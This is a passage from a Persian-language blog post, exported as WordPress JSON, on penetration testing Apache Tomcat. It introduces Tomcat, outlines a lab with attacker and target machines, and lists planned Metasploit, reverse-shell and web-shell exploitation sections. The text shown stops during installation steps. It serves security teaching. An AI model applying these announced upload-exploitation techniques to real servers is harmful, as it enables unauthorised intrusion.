{"id":19472,"date":"2025-05-24T14:55:21","date_gmt":"2025-05-24T11:25:21","guid":{"rendered":"https:\/\/liangroup.net\/blog\/?p=19472"},"modified":"2025-05-24T10:21:15","modified_gmt":"2025-05-24T06:51:15","slug":"tomcat-penetration-testing","status":"publish","type":"post","link":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/","title":{"rendered":"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat"},"content":{"rendered":"<p><span style=\"font-size: 10pt\">Tomcat Penetration Testing \u0646\u0642\u0634 \u062d\u06cc\u0627\u062a\u06cc \u062f\u0631 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631 Apache Tomcat \u0627\u06cc\u0641\u0627 \u0645\u06cc\u200c\u06a9\u0646\u062f\u061b \u0633\u0631\u0648\u06cc\u0633\u06cc \u06a9\u0647 \u0628\u0647\u200c\u0637\u0648\u0631 \u06af\u0633\u062a\u0631\u062f\u0647 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u06cc\u06a9 web server \u0648 servlet container \u062f\u0631 \u062a\u0648\u0633\u0639\u0647\u200c\u06cc \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u062a\u062d\u062a \u0648\u0628 \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f. 
\u062f\u0631 \u0627\u0628\u062a\u062f\u0627\u060c Apache Software Foundation \u0627\u06cc\u0646 \u067e\u0631\u0648\u0698\u0647 \u0631\u0627 \u0628\u0627 \u0647\u062f\u0641 \u0627\u0631\u0627\u0626\u0647\u200c\u06cc \u06cc\u06a9 \u067e\u0644\u062a\u0641\u0631\u0645 \u0646\u0645\u0627\u06cc\u0634\u06cc \u0628\u0631\u0627\u06cc \u0641\u0646\u0627\u0648\u0631\u06cc\u200c\u0647\u0627\u06cc Java Servlet \u0648 JavaServer Pages (JSP) \u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u06a9\u0631\u062f\u061b \u0641\u0646\u0627\u0648\u0631\u06cc\u200c\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0627\u0635\u0644\u06cc \u0628\u0633\u06cc\u0627\u0631\u06cc \u0627\u0632 Java web applications \u0631\u0627 \u062a\u0634\u06a9\u06cc\u0644 \u0645\u06cc\u200c\u062f\u0647\u0646\u062f. \u0628\u0627 \u06af\u0630\u0634\u062a \u0632\u0645\u0627\u0646\u060c Tomcat \u0642\u0627\u0628\u0644\u06cc\u062a\u200c\u0647\u0627\u06cc \u062e\u0648\u062f \u0631\u0627 \u06af\u0633\u062a\u0631\u0634 \u062f\u0627\u062f \u062a\u0627 \u0627\u0632 \u0633\u0627\u06cc\u0631 \u0641\u0646\u0627\u0648\u0631\u06cc\u200c\u0647\u0627\u06cc Java \u062f\u0631 \u0628\u0633\u062a\u0631 \u0648\u0628 \u0646\u06cc\u0632 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u06a9\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0639\u0644\u0627\u0648\u0647 \u0628\u0631 \u0627\u06cc\u0646\u060c \u06cc\u06a9\u06cc \u0627\u0632 \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc \u0642\u0627\u0628\u0644\u200c\u062a\u0648\u062c\u0647 Tomcat\u060c \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0622\u0646 \u0627\u0632 \u0627\u0633\u062a\u0642\u0631\u0627\u0631 \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u0648\u0628 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc WAR (Web Application Archive) \u0627\u0633\u062a. 
\u0627\u06cc\u0646 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627 \u062a\u0645\u0627\u0645\u06cc \u0645\u0624\u0644\u0641\u0647\u200c\u0647\u0627\u06cc \u06cc\u06a9 web application \u2014 \u0634\u0627\u0645\u0644 \u06a9\u062f\u060c \u0635\u0641\u062d\u0627\u062a \u0648 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u0645\u0631\u062a\u0628\u0637 \u2014 \u0631\u0627 \u062f\u0631 \u0642\u0627\u0644\u0628 \u06cc\u06a9 \u0628\u0633\u062a\u0647\u200c\u06cc \u0648\u0627\u062d\u062f \u062a\u062c\u0645\u06cc\u0639 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f \u0648 \u0641\u0631\u0627\u06cc\u0646\u062f \u0627\u0633\u062a\u0642\u0631\u0627\u0631 \u0631\u0627 \u0633\u0627\u062f\u0647\u200c\u062a\u0631 \u0645\u06cc\u200c\u0633\u0627\u0632\u0646\u062f. \u062f\u0631 \u0646\u062a\u06cc\u062c\u0647\u060c Tomcat \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc WAR \u062e\u0648\u062f \u0631\u0627 upload \u0648 \u0627\u062c\u0631\u0627\u00a0 \u06a9\u0646\u0646\u062f\u060c \u0648 \u0628\u062f\u06cc\u0646\u200c\u062a\u0631\u062a\u06cc\u0628\u060c \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u062e\u0648\u062f \u0631\u0627 \u0628\u0631 \u0628\u0633\u062a\u0631 \u0627\u06cc\u0646\u062a\u0631\u0646\u062a \u0645\u06cc\u0632\u0628\u0627\u0646\u06cc \u0646\u0645\u0627\u06cc\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0639\u0644\u0627\u0648\u0647 \u0628\u0631 WAR files\u060c Tomcat \u0627\u0632 \u0627\u0633\u062a\u0642\u0631\u0627\u0631 \u0645\u0633\u062a\u0642\u06cc\u0645 \u0635\u0641\u062d\u0627\u062a JSP \u0646\u06cc\u0632 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f. 
JSP (JavaServer Pages) \u06cc\u06a9 \u0641\u0646\u0627\u0648\u0631\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0628\u0647 \u062a\u0648\u0633\u0639\u0647\u200c\u062f\u0647\u0646\u062f\u06af\u0627\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u0635\u0641\u062d\u0627\u062a \u0648\u0628 \u062f\u06cc\u0646\u0627\u0645\u06cc\u06a9 \u0631\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Java \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u0646\u062f. \u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646\u060c Tomcat \u062a\u0648\u0627\u0646\u0627\u06cc\u06cc \u0627\u062c\u0631\u0627\u06cc \u0645\u0633\u062a\u0642\u06cc\u0645 \u0627\u06cc\u0646 \u0635\u0641\u062d\u0627\u062a JSP \u0631\u0627 \u062f\u0627\u0631\u062f \u0648 \u0647\u0645\u06cc\u0646 \u0648\u06cc\u0698\u06af\u06cc \u0622\u0646 \u0631\u0627 \u0628\u0647 \u06cc\u06a9 \u067e\u0644\u062a\u0641\u0631\u0645 \u0686\u0646\u062f\u0645\u0646\u0638\u0648\u0631\u0647 \u0628\u0631\u0627\u06cc hosting \u0637\u06cc\u0641 \u06af\u0633\u062a\u0631\u062f\u0647\u200c\u0627\u06cc \u0627\u0632 web applications \u062a\u0628\u062f\u06cc\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0647\u200c\u0635\u0648\u0631\u062a \u067e\u06cc\u0634\u200c\u0641\u0631\u0636\u060c Tomcat \u0627\u0632 \u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u06cc WAR files \u0648 \u0635\u0641\u062d\u0627\u062a JSP \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f. 
\u0628\u0627 \u0627\u06cc\u0646 \u062d\u0627\u0644\u060c \u0645\u062f\u06cc\u0631\u0627\u0646 \u0633\u06cc\u0633\u062a\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u0622\u0646 \u0631\u0627 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u06a9\u0646\u0646\u062f \u062a\u0627 \u0627\u0645\u0646\u06cc\u062a \u0648 \u06a9\u0646\u062a\u0631\u0644 \u0628\u06cc\u0634\u062a\u0631\u06cc \u0628\u0631 \u0631\u0648\u06cc file uploads \u0627\u0639\u0645\u0627\u0644 \u0634\u0648\u062f\u060c \u06a9\u0647 \u0627\u06cc\u0646 \u0627\u0645\u0631 \u0628\u0647 \u0628\u0647\u0628\u0648\u062f \u06a9\u0644\u06cc \u0627\u0645\u0646\u06cc\u062a server \u0645\u0646\u062c\u0631 \u0645\u06cc\u200c\u06af\u0631\u062f\u062f.<\/span><\/p>\n<h2>\u0645\u0639\u0631\u0641\u06cc Tomcat<\/h2>\n<p><span style=\"font-size: 10pt\">Apache Tomcat \u06cc\u06a9 open-source web server \u0648 servlet container \u0627\u0633\u062a \u06a9\u0647 \u062a\u0648\u0633\u0637 Apache Software Foundation \u062a\u0648\u0633\u0639\u0647 \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a. 
\u0627\u06cc\u0646 \u067e\u0644\u062a\u0641\u0631\u0645 \u0627\u062c\u0631\u0627\u06cc \u0641\u0646\u0627\u0648\u0631\u06cc\u200c\u0647\u0627\u06cc Java Servlet\u060c JavaServer Pages (JSP)\u060c \u0648 \u0633\u0627\u06cc\u0631 \u0627\u0633\u062a\u0627\u0646\u062f\u0627\u0631\u062f\u0647\u0627\u06cc \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 Java EE \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f \u0648 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u06cc\u06a9\u06cc \u0627\u0632 \u0645\u062d\u0628\u0648\u0628\u200c\u062a\u0631\u06cc\u0646 \u0627\u0646\u062a\u062e\u0627\u0628\u200c\u0647\u0627 \u0628\u0631\u0627\u06cc \u0645\u06cc\u0632\u0628\u0627\u0646\u06cc \u0648 \u0627\u062c\u0631\u0627\u06cc Java web applications \u062f\u0631 \u0645\u062d\u06cc\u0637\u200c\u0647\u0627\u06cc \u062a\u0648\u0633\u0639\u0647 \u0648 production \u0634\u0646\u0627\u062e\u062a\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f. \u0633\u0627\u062f\u06af\u06cc \u062f\u0631 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u060c \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0627\u0632 WAR deployment\u060c \u0648 \u0645\u0639\u0645\u0627\u0631\u06cc \u0633\u0628\u06a9\u060c \u0622\u0646 \u0631\u0627 \u0628\u0647 \u06af\u0632\u06cc\u0646\u0647\u200c\u0627\u06cc \u0645\u062d\u0628\u0648\u0628 \u062f\u0631 \u0645\u06cc\u0627\u0646 \u062a\u0648\u0633\u0639\u0647\u200c\u062f\u0647\u0646\u062f\u06af\u0627\u0646 \u0648 \u062a\u06cc\u0645\u200c\u0647\u0627\u06cc DevOps \u062a\u0628\u062f\u06cc\u0644 \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u06a9\u0627\u0631\u0628\u0631\u062f\u0647\u0627\u06cc<\/strong><strong> Tomcat <\/strong><strong>\u062f\u0631 \u0627\u0645\u0646\u06cc\u062a<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0627 \u0648\u062c\u0648\u062f \u0627\u06cc\u0646\u06a9\u0647 Apache Tomcat \u062f\u0631 \u0627\u0635\u0644 \u06cc\u06a9 web server \u0648 servlet container 
\u0628\u0631\u0627\u06cc \u0627\u062c\u0631\u0627\u06cc Java web applications \u0627\u0633\u062a\u060c \u0646\u0642\u0634 \u0645\u0647\u0645\u06cc \u0646\u06cc\u0632 \u062f\u0631 \u0632\u0645\u06cc\u0646\u0647\u200c\u06cc \u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u0645\u0627\u0646\u0647\u200c\u0647\u0627\u06cc \u062a\u062d\u062a \u0648\u0628 \u0627\u06cc\u0641\u0627 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0645\u0647\u0645\u200c\u062a\u0631\u06cc\u0646 \u06a9\u0627\u0631\u0628\u0631\u062f\u0647\u0627\u06cc \u0622\u0646 \u062f\u0631 \u062d\u0648\u0632\u0647 \u0627\u0645\u0646\u06cc\u062a \u0639\u0628\u0627\u0631\u062a\u200c\u0627\u0646\u062f \u0627\u0632:<\/span><\/p>\n<ol>\n<li><span style=\"font-size: 10pt\"><strong>\u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0633\u0637\u062d \u0633\u0631\u0648\u0631<\/strong><strong> (Server Hardening):<br \/>\n<\/strong>Tomcat \u0627\u0645\u06a9\u0627\u0646 \u0627\u0639\u0645\u0627\u0644 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u0627\u0645\u0646\u06cc\u062a\u06cc \u067e\u06cc\u0634\u0631\u0641\u062a\u0647\u200c\u0627\u06cc \u0645\u0627\u0646\u0646\u062f \u0645\u062d\u062f\u0648\u062f \u06a9\u0631\u062f\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u062f\u0627\u06cc\u0631\u06a9\u062a\u0648\u0631\u06cc\u200c\u0647\u0627\u060c \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc directory listing\u060c \u0648 \u06a9\u0646\u062a\u0631\u0644 \u062f\u0642\u06cc\u0642 user permissions \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u0645\u062f\u06cc\u0631\u06cc\u062a \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0648 \u0645\u062c\u0648\u0632\u062f\u0647\u06cc<\/strong><strong> (Authentication &amp; Authorization):<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0627\u0632 \u0637\u0631\u06cc\u0642 Realms\u060c Tomcat 
\u0642\u0627\u0628\u0644\u06cc\u062a \u0627\u062a\u0635\u0627\u0644 \u0628\u0647 \u067e\u0627\u06cc\u06af\u0627\u0647\u200c\u0647\u0627\u06cc \u062f\u0627\u062f\u0647\u060c LDAP \u06cc\u0627 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u0645\u062d\u0644\u06cc \u0628\u0631\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0648 \u06a9\u0646\u062a\u0631\u0644 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0645\u0646\u0627\u0628\u0639 \u0631\u0627 \u062f\u0627\u0631\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>SSL\/TLS Configuration:<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">Tomcat \u0627\u0632 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0627\u0645\u0646 HTTPS \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 SSL\/TLS \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f \u0648 \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f \u06a9\u0647 \u062f\u0627\u062f\u0647\u200c\u0647\u0627 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u0631\u0645\u0632\u0646\u06af\u0627\u0631\u06cc\u200c\u0634\u062f\u0647 \u0628\u06cc\u0646 \u06a9\u0644\u0627\u06cc\u0646\u062a \u0648 \u0633\u0631\u0648\u0631 \u0645\u0646\u062a\u0642\u0644 \u0634\u0648\u0646\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u0622\u067e\u0644\u0648\u062f\u0647\u0627\u06cc \u0645\u062e\u0631\u0628<\/strong><strong> (Malicious Upload Prevention):<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0628\u0627 \u062a\u0646\u0638\u06cc\u0645 \u062f\u0642\u06cc\u0642 \u0645\u062d\u062f\u0648\u062f\u06cc\u062a\u200c\u0647\u0627 \u0628\u0631\u0627\u06cc file upload (\u0645\u0627\u0646\u0646\u062f \u0646\u0648\u0639 MIME\u060c \u062d\u062c\u0645 \u0641\u0627\u06cc\u0644\u060c \u0648 
\u0645\u0633\u06cc\u0631 \u0630\u062e\u06cc\u0631\u0647\u200c\u0633\u0627\u0632\u06cc)\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0632 Remote Code Execution \u06cc\u0627 Web Shell \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u06a9\u0631\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0627\u0632 \u0645\u06a9\u0627\u0646\u06cc\u0632\u0645\u200c\u0647\u0627\u06cc<\/strong><strong> Logging <\/strong><strong>\u0648<\/strong><strong> Auditing:<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0627\u0645\u06a9\u0627\u0646 \u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc access logs \u0648 error logs \u062f\u0631 Tomcat\u060c \u0628\u0647 \u062a\u06cc\u0645\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u0641\u0639\u0627\u0644\u06cc\u062a\u200c\u0647\u0627\u06cc \u0645\u0634\u06a9\u0648\u06a9 \u0631\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc\u060c \u062a\u062d\u0644\u06cc\u0644 \u0648 \u0645\u0633\u062a\u0646\u062f\u0633\u0627\u0632\u06cc \u06a9\u0646\u0646\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u0645\u062d\u06cc\u0637 \u0645\u0646\u0627\u0633\u0628 \u0628\u0631\u0627\u06cc \u0622\u0632\u0645\u0627\u06cc\u0634\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc<\/strong><strong> (Security Testing Platform):<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0628\u0633\u06cc\u0627\u0631\u06cc \u0627\u0632 \u062a\u06cc\u0645\u200c\u0647\u0627\u06cc penetration testing \u0627\u0632 \u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u06cc\u0627 \u0633\u0641\u0627\u0631\u0634\u06cc\u200c\u0634\u062f\u0647\u200c\u06cc Tomcat \u0628\u0631\u0627\u06cc \u0627\u062c\u0631\u0627\u06cc \u062a\u0633\u062a\u200c\u0647\u0627\u06cc \u0646\u0641\u0648\u0630\u060c \u0628\u0631\u0631\u0633\u06cc 
misconfiguration\u0647\u0627\u060c \u0648 \u062a\u062d\u0644\u06cc\u0644 vulnerability exploitation \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.<\/span><\/li>\n<\/ol>\n<h2>\u0641\u0647\u0631\u0633\u062a \u0645\u0637\u0627\u0644\u0628<\/h2>\n<ul>\n<li><strong>\u0645\u0642\u062f\u0645\u0647<\/strong><\/li>\n<li><strong>\u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u0622\u0632\u0645\u0627\u06cc\u0634\u06af\u0627\u0647<\/strong><\/li>\n<li><strong>\u0646\u0635\u0628<\/strong><strong> Tomcat <\/strong><\/li>\n<li><strong>\u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc<\/strong><\/li>\n<li><strong>\u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0648 \u062c\u0645\u0639\u200c\u0622\u0648\u0631\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a<\/strong><\/li>\n<li><strong>\u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 <\/strong><strong>Metasploit Framework<\/strong><\/li>\n<li><strong>\u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u062f\u0633\u062a\u06cc<\/strong><strong> Reverse Shell<\/strong><\/li>\n<li><strong>\u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u062f\u0633\u062a\u06cc<\/strong><strong> Web Shell<\/strong><\/li>\n<li><strong>\u062c\u0645\u0639\u200c\u0628\u0646\u062f\u06cc<\/strong><\/li>\n<\/ul>\n<h2>\u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u0622\u0632\u0645\u0627\u06cc\u0634\u06af\u0627\u0647<\/h2>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0645\u0642\u0627\u0644\u0647\u060c \u0642\u0635\u062f \u062f\u0627\u0631\u06cc\u0645 \u06cc\u06a9 Tomcat server \u0631\u0627 \u0631\u0648\u06cc \u0645\u0627\u0634\u06cc\u0646 Ubuntu \u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u06a9\u0631\u062f\u0647 \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 file upload 
\u0631\u0627 \u0645\u0648\u0631\u062f \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0642\u0631\u0627\u0631 \u062f\u0647\u06cc\u0645. \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u0645\u0646\u0638\u0648\u0631\u060c \u062f\u0648 \u0645\u0627\u0634\u06cc\u0646 \u062f\u0631 \u06cc\u06a9 \u0645\u062d\u06cc\u0637 \u0634\u0628\u06a9\u0647 \u0645\u062d\u0644\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0634\u062f\u0647\u200c\u0627\u0646\u062f:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">Target Machine: Ubuntu \u2013 \u0622\u062f\u0631\u0633 IP: 192.168.1.5<\/span><\/li>\n<li><span style=\"font-size: 10pt\">Attacker Machine: Kali Linux \u2013 \u0622\u062f\u0631\u0633 IP: 192.168.1.7<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0633\u0627\u062e\u062a\u0627\u0631 \u0622\u0632\u0645\u0627\u06cc\u0634\u06af\u0627\u0647\u06cc \u0627\u0645\u06a9\u0627\u0646 \u0627\u062c\u0631\u0627\u06cc \u062a\u0633\u062a\u200c\u0647\u0627\u06cc \u0646\u0641\u0648\u0630 \u0648\u0627\u0642\u0639\u06cc \u062f\u0631 \u0645\u062d\u06cc\u0637 \u06a9\u0646\u062a\u0631\u0644\u200c\u0634\u062f\u0647 \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f \u0648 \u0628\u0631\u0627\u06cc \u0634\u0628\u06cc\u0647\u200c\u0633\u0627\u0632\u06cc \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc \u062d\u0645\u0644\u0647 \u0648 \u062a\u062d\u0644\u06cc\u0644 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u060c \u06a9\u0627\u0645\u0644\u0627\u064b \u0645\u0646\u0627\u0633\u0628 \u0627\u0633\u062a.<\/span><\/p>\n<h2><strong>\u0646\u0635\u0628<\/strong><\/h2>\n<p><span style=\"font-size: 10pt\">Apache Tomcat \u0628\u0647 Java \u0648\u0627\u0628\u0633\u062a\u0647 \u0627\u0633\u062a\u060c \u0628\u0647 \u0627\u06cc\u0646 \u0645\u0639\u0646\u0627 \u06a9\u0647 \u0628\u0627\u06cc\u062f Java JDK (Java Development Kit) \u0628\u0631 \u0631\u0648\u06cc \u0633\u0631\u0648\u0631 \u0634\u0645\u0627 
\u0646\u0635\u0628 \u0634\u062f\u0647 \u0628\u0627\u0634\u062f. \u0628\u0631\u0627\u06cc \u0646\u0635\u0628 \u0622\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u06cc\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">apt install openjdk-21-jdk<\/pre>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u0627\u0641\u0632\u0648\u062f\u0646 \u06cc\u06a9 \u06a9\u0627\u0631\u0628\u0631 \u062c\u062f\u06cc\u062f \u0628\u0627 \u0646\u0627\u0645 tomcat \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">useradd -m -U -d \/opt\/tomcat -s \/bin\/false tomcat<\/pre>\n<p><img decoding=\"async\" class=\"alignnone  wp-image-19473\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/1-8-300x34.png\" alt=\"\" width=\"565\" height=\"64\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/1-8-300x34.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/1-8-768x87.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/1-8-150x17.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/1-8.png 887w\" sizes=\"(max-width: 565px) 100vw, 565px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0645\u0631\u062d\u0644\u0647\u200c\u06cc \u0628\u0639\u062f\u060c \u0641\u0627\u06cc\u0644 \u0641\u0634\u0631\u062f\u0647\u200c\u06cc tar.gz \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 Tomcat \u0631\u0627 \u0627\u0632 \u0648\u0628\u200c\u0633\u0627\u06cc\u062a \u0631\u0633\u0645\u06cc \u062f\u0627\u0646\u0644\u0648\u062f \u06a9\u0646\u06cc\u062f.<\/span><\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone  wp-image-19474\" 
src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/2-7-290x300.png\" alt=\"\" width=\"561\" height=\"580\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/2-7-290x300.png 290w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/2-7-768x796.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/2-7-150x155.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/2-7.png 833w\" sizes=\"(max-width: 561px) 100vw, 561px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u0633\u067e\u0633\u060c \u0622\u062e\u0631\u06cc\u0646 \u0646\u0633\u062e\u0647\u200c\u06cc Tomcat \u0631\u0627 \u0627\u0632 \u0648\u0628\u200c\u0633\u0627\u06cc\u062a \u0631\u0633\u0645\u06cc \u062f\u0627\u0646\u0644\u0648\u062f \u06a9\u0631\u062f\u0647 \u0648 \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645 Ubuntu \u0630\u062e\u06cc\u0631\u0647 \u06a9\u0646\u06cc\u062f\u060c \u0633\u067e\u0633 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u062f\u0627\u0646\u0644\u0648\u062f \u0634\u062f\u0647 \u0631\u0627 extract \u0646\u0645\u0627\u06cc\u06cc\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">wget 